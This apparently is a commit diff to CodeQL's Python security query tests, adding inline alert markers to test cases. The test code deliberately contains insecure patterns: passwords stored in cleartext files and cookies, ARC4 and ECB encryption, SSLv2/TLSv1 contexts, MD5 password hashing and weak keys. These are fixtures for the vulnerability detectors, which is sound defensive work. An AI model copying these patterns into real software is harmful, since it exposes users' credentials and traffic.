print(creditcard) # NOT OK # $ Alert + print(debit_card) # NOT OK # $ Alert + print(bank_number) # NOT OK # $ Alert print(bank_account) # NOT OK, but NOT FOUND - "account" is treated as having the "id" classification and thus excluded. print(accountNo) # NOT OK, but NOT FOUND - "account" is treated as having the "id" classification and thus excluded. - print(ccn) # NOT OK - print(user_ccn) # NOT OK + print(ccn) # NOT OK # $ Alert + print(user_ccn) # NOT OK # $ Alert print(succNode) # OK diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected index 588cfae32ef5..66c192b89e03 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected @@ -1,3 +1,7 @@ +#select +| test.py:12:21:12:28 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:12:21:12:28 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:13:22:13:45 | ControlFlowNode for Attribute() | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:13:22:13:45 | ControlFlowNode for Attribute() | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:15:26:15:33 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:15:26:15:33 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | edges | test.py:9:5:9:12 | ControlFlowNode for password | test.py:12:21:12:28 | ControlFlowNode for password | provenance | | | test.py:9:5:9:12 | ControlFlowNode for password | test.py:13:22:13:45 | ControlFlowNode for Attribute() | provenance | | @@ -10,7 +14,3 @@ nodes | test.py:13:22:13:45 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:15:26:15:33 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | subpaths -#select -| test.py:12:21:12:28 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:12:21:12:28 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:13:22:13:45 | ControlFlowNode for Attribute() | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:13:22:13:45 | ControlFlowNode for Attribute() | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:15:26:15:33 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:15:26:15:33 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.qlref b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.qlref index a32206e8d6a4..a39c1b1c4efd 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.qlref +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.qlref @@ -1 +1,2 @@ -Security/CWE-312/CleartextStorage.ql \ No newline at end of file +query: Security/CWE-312/CleartextStorage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/test.py b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/test.py index 91b7fb7e6c26..c46b8d89bb96 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/test.py +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/test.py @@ -6,10 +6,10 @@ def get_password(): def write_password(filename): - password = get_password() + password = get_password() # $ Source path = pathlib.Path(filename) - path.write_text(password) # NOT OK - path.write_bytes(password.encode("utf-8")) # NOT OK + path.write_text(password) # NOT OK # $ Alert + path.write_bytes(password.encode("utf-8")) # NOT OK # $ Alert - path.open("w").write(password) # NOT OK + path.open("w").write(password) # NOT OK # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected index ea41c1ba6516..ed748c70df3e 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected @@ -1,3 +1,8 @@ +#select +| password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | sensitive data (password) | +| password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | sensitive data (password) | +| test.py:17:20:17:27 | ControlFlowNode for password | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:17:20:17:27 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:19:25:19:29 | ControlFlowNode for lines | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:19:25:19:29 | ControlFlowNode for lines | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | edges | password_in_cookie.py:7:5:7:12 | ControlFlowNode for password | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | provenance | | | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:7:5:7:12 | ControlFlowNode for password | provenance | | @@ -24,8 +29,3 @@ nodes | test.py:18:18:18:32 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | | test.py:19:25:19:29 | ControlFlowNode for lines | semmle.label | ControlFlowNode for lines | subpaths -#select -| password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | sensitive data (password) | -| password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | sensitive data (password) | -| test.py:17:20:17:27 | ControlFlowNode for password | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:17:20:17:27 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:19:25:19:29 | ControlFlowNode for lines | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:19:25:19:29 | ControlFlowNode for lines | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.qlref b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.qlref index a32206e8d6a4..a39c1b1c4efd 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.qlref +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.qlref @@ -1 +1,2 @@ -Security/CWE-312/CleartextStorage.ql \ No newline at end of file +query: Security/CWE-312/CleartextStorage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/password_in_cookie.py b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/password_in_cookie.py index 2688c13dace3..cec28246939b 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/password_in_cookie.py +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/password_in_cookie.py @@ -4,14 +4,14 @@ @app.route('/') def index(): - password = request.args.get("password") + password = request.args.get("password") # $ Source resp = make_response(render_template(...)) - resp.set_cookie("password", password) # NOT OK + resp.set_cookie("password", password) # NOT OK # $ Alert return resp @app.route('/') def index2(): - password = request.args.get("password") + password = request.args.get("password") # $ Source resp = Response(...) - resp.set_cookie("password", password) # NOT OK + resp.set_cookie("password", password) # NOT OK # $ Alert return resp diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/test.py b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/test.py index 6d04aa4b1702..cfb93690901b 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/test.py +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/test.py @@ -12,11 +12,11 @@ def write_cert(filename): file.writelines(lines) # OK def write_password(filename): - password = get_password() + password = get_password() # $ Source with open(filename, "w") as file: - file.write(password) # NOT OK + file.write(password) # NOT OK # $ Alert lines = [password + "\n"] - file.writelines(lines) # NOT OK + file.writelines(lines) # NOT OK # $ Alert def FPs(): # just like for cleartext-logging see that file for more elaborate tests diff --git a/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/WeakCryptoKey.qlref b/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/WeakCryptoKey.qlref index 70a66eef06ef..3ee942673d37 100644 --- a/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/WeakCryptoKey.qlref +++ b/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/WeakCryptoKey.qlref @@ -1 +1,2 @@ -Security/CWE-326/WeakCryptoKey.ql +query: Security/CWE-326/WeakCryptoKey.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/weak_crypto.py b/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/weak_crypto.py index 5ec929c7d094..0f16a7ce8175 100644 --- a/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/weak_crypto.py +++ b/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/weak_crypto.py @@ -65,23 +65,23 @@ # Weak keys -dsa_gen_key(DSA_WEAK) -ec_gen_key(EC_WEAK) -rsa_gen_key(65537, RSA_WEAK) +dsa_gen_key(DSA_WEAK) # $ Alert +ec_gen_key(EC_WEAK) # $ Alert +rsa_gen_key(65537, RSA_WEAK) # $ Alert -dsa_gen_key(key_size=DSA_WEAK) -ec_gen_key(curve=EC_WEAK) -rsa_gen_key(65537, key_size=RSA_WEAK) +dsa_gen_key(key_size=DSA_WEAK) # $ Alert +ec_gen_key(curve=EC_WEAK) # $ Alert +rsa_gen_key(65537, key_size=RSA_WEAK) # $ Alert -DSA.generate(DSA_WEAK) -RSA.generate(RSA_WEAK) +DSA.generate(DSA_WEAK) # $ Alert +RSA.generate(RSA_WEAK) # $ Alert # ------------------------------------------------------------------------------ # Through function calls def make_new_rsa_key_weak(bits): - return RSA.generate(bits) # NOT OK + return RSA.generate(bits) # NOT OK # $ Alert make_new_rsa_key_weak(RSA_WEAK) diff --git a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/BrokenCryptoAlgorithm.qlref b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/BrokenCryptoAlgorithm.qlref index 3f7aff53700d..81a5bd0ae94e 100644 --- a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/BrokenCryptoAlgorithm.qlref +++ b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/BrokenCryptoAlgorithm.qlref @@ -1 +1,2 @@ -Security/CWE-327/BrokenCryptoAlgorithm.ql +query: Security/CWE-327/BrokenCryptoAlgorithm.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptodome.py b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptodome.py index 16482054eb23..1287f513a5d2 100644 --- a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptodome.py +++ b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptodome.py @@ -8,11 +8,11 @@ secret_message = b"secret message" cipher = ARC4.new(key) -encrypted = cipher.encrypt(secret_message) # NOT OK +encrypted = cipher.encrypt(secret_message) # NOT OK # $ Alert print(secret_message, encrypted) cipher = AES.new(key, AES.MODE_ECB) -encrypted = cipher.encrypt(secret_message) # NOT OK +encrypted = cipher.encrypt(secret_message) # NOT OK # $ Alert print(secret_message, encrypted) diff --git a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptography.py b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptography.py index 4c7317cdba40..358eb091cc83 100644 --- a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptography.py +++ b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptography.py @@ -10,7 +10,7 @@ secret_message = b"secret message" encryptor = cipher.encryptor() -encrypted = encryptor.update(secret_message) # NOT OK +encrypted = encryptor.update(secret_message) # NOT OK # $ Alert encrypted += encryptor.finalize() print(secret_message, encrypted) @@ -19,7 +19,7 @@ cipher = Cipher(algorithm, mode=modes.ECB()) encryptor = cipher.encryptor() -encrypted = encryptor.update(secret_message + b'\x80\x00') # NOT OK +encrypted = encryptor.update(secret_message + b'\x80\x00') # NOT OK # $ Alert encrypted += encryptor.finalize() print(secret_message, encrypted) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureDefaultProtocol.qlref b/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureDefaultProtocol.qlref index 13599b14931c..64b934bc3855 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureDefaultProtocol.qlref +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureDefaultProtocol.qlref @@ -1 +1,2 @@ -Security/CWE-327/InsecureDefaultProtocol.ql +query: Security/CWE-327/InsecureDefaultProtocol.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureProtocol.py b/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureProtocol.py index 1ea2a51a44e7..a99bfe3005a5 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureProtocol.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureProtocol.py @@ -4,4 +4,4 @@ ssl.wrap_socket(ssl_version=ssl.PROTOCOL_TLSv1_2) # possibly insecure default -ssl.wrap_socket() +ssl.wrap_socket() # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.py index ab80ed47dacd..80af8bbad378 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.py @@ -3,25 +3,25 @@ from ssl import SSLContext # insecure versions specified -ssl.wrap_socket(ssl_version=ssl.PROTOCOL_SSLv2) -ssl.wrap_socket(ssl_version=ssl.PROTOCOL_SSLv3) -ssl.wrap_socket(ssl_version=ssl.PROTOCOL_TLSv1) +ssl.wrap_socket(ssl_version=ssl.PROTOCOL_SSLv2) # $ Alert +ssl.wrap_socket(ssl_version=ssl.PROTOCOL_SSLv3) # $ Alert +ssl.wrap_socket(ssl_version=ssl.PROTOCOL_TLSv1) # $ Alert -SSLContext(protocol=ssl.PROTOCOL_SSLv2) -SSLContext(protocol=ssl.PROTOCOL_SSLv3) -SSLContext(protocol=ssl.PROTOCOL_TLSv1) +SSLContext(protocol=ssl.PROTOCOL_SSLv2) # $ Alert +SSLContext(protocol=ssl.PROTOCOL_SSLv3) # $ Alert +SSLContext(protocol=ssl.PROTOCOL_TLSv1) # $ Alert -SSL.Context(SSL.SSLv2_METHOD) -SSL.Context(SSL.SSLv3_METHOD) -SSL.Context(SSL.TLSv1_METHOD) +SSL.Context(SSL.SSLv2_METHOD) # $ Alert +SSL.Context(SSL.SSLv3_METHOD) # $ Alert +SSL.Context(SSL.TLSv1_METHOD) # $ Alert METHOD = SSL.SSLv2_METHOD -SSL.Context(METHOD) +SSL.Context(METHOD) # $ Alert # importing the protocol constant directly from ssl import PROTOCOL_SSLv2 -ssl.wrap_socket(ssl_version=PROTOCOL_SSLv2) -SSLContext(protocol=PROTOCOL_SSLv2) +ssl.wrap_socket(ssl_version=PROTOCOL_SSLv2) # $ Alert +SSLContext(protocol=PROTOCOL_SSLv2) # $ Alert # secure versions specified ssl.wrap_socket(ssl_version=ssl.PROTOCOL_TLSv1_2) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.qlref b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.qlref index c06a937ff57d..75ce269cc68b 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.qlref +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.qlref @@ -1 +1,2 @@ -Security/CWE-327/InsecureProtocol.ql +query: Security/CWE-327/InsecureProtocol.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_all_one_file.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_all_one_file.py index aab459ceeead..5a2f4614afaf 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_all_one_file.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_all_one_file.py @@ -22,9 +22,9 @@ print(ssock.version()) with socket.create_connection((hostname, 443)) as sock: - with copy_completely_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: + with copy_completely_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) with socket.create_connection((hostname, 443)) as sock: - with copy_also_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: + with copy_also_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_use.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_use.py index 3c12fd813558..390acf747ab1 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_use.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_use.py @@ -10,9 +10,9 @@ print(ssock.version()) with socket.create_connection((hostname, 443)) as sock: - with completely_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: + with completely_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) with socket.create_connection((hostname, 443)) as sock: - with also_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: + with also_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/pyOpenSSL_fluent.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/pyOpenSSL_fluent.py index fa7714118828..729e968e5c10 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/pyOpenSSL_fluent.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/pyOpenSSL_fluent.py @@ -5,7 +5,7 @@ def test_fluent(): hostname = 'www.python.org' context = SSL.Context(SSL.SSLv23_METHOD) - conn = SSL.Connection(context, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) + conn = SSL.Connection(context, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) # $ Alert r = conn.connect((hostname, 443)) print(conn.get_protocol_version_name()) @@ -15,7 +15,7 @@ def test_fluent_no_TLSv1(): context = SSL.Context(SSL.SSLv23_METHOD) context.set_options(SSL.OP_NO_TLSv1) - conn = SSL.Connection(context, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) + conn = SSL.Connection(context, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) # $ Alert r = conn.connect((hostname, 443)) print(conn.get_protocol_version_name()) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/ssl_fluent.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/ssl_fluent.py index a8e491a42f1e..e4d71de56955 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/ssl_fluent.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/ssl_fluent.py @@ -6,7 +6,7 @@ def test_fluent_tls(): context = ssl.SSLContext(ssl.PROTOCOL_TLS) with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) @@ -16,7 +16,7 @@ def test_fluent_tls_no_TLSv1(): context.options |= ssl.OP_NO_TLSv1 with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_fluent_tls_client_no_TLSv1(): @@ -25,7 +25,7 @@ def test_fluent_tls_client_no_TLSv1(): context.options |= ssl.OP_NO_TLSv1 with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_fluent_tls_server_no_TLSv1(): @@ -34,7 +34,7 @@ def test_fluent_tls_server_no_TLSv1(): context.options |= ssl.OP_NO_TLSv1 with socket.create_server((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_fluent_tls_safe(): @@ -54,7 +54,7 @@ def test_fluent_ssl(): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) @@ -68,13 +68,13 @@ def create_secure_context(): def create_connection(context): with socket.create_connection(('www.python.org', 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_delegated_context_unsafe(): context = create_relaxed_context() with socket.create_connection(('www.python.org', 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_delegated_context_safe(): @@ -94,7 +94,7 @@ def test_delegated_context_made_unsafe(): context = create_secure_context() context.options &= ~ssl.OP_NO_TLSv1_1 with socket.create_connection(('www.python.org', 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_delegated_connection_unsafe(): @@ -143,7 +143,7 @@ def test_fluent_ssl_unsafe_version(): context.minimum_version = ssl.TLSVersion.TLSv1_1 with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_fluent_ssl_safe_version(): @@ -162,5 +162,5 @@ def test_fluent_explicitly_unsafe(): context.options &= ~ssl.OP_NO_SSLv3 with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected index 1027fbf4963c..ae081dd1aa05 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected @@ -1,3 +1,16 @@ +#select +| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | +| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | +| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | +| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | +| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | Sensitive data (password) | edges | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:2:23:2:34 | ControlFlowNode for get_password | provenance | | | test_cryptodome.py:2:23:2:34 | ControlFlowNode for get_password | test_cryptodome.py:13:17:13:28 | ControlFlowNode for get_password | provenance | | @@ -61,16 +74,3 @@ nodes | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | semmle.label | ControlFlowNode for get_password() | | test_cryptography.py:27:19:27:27 | 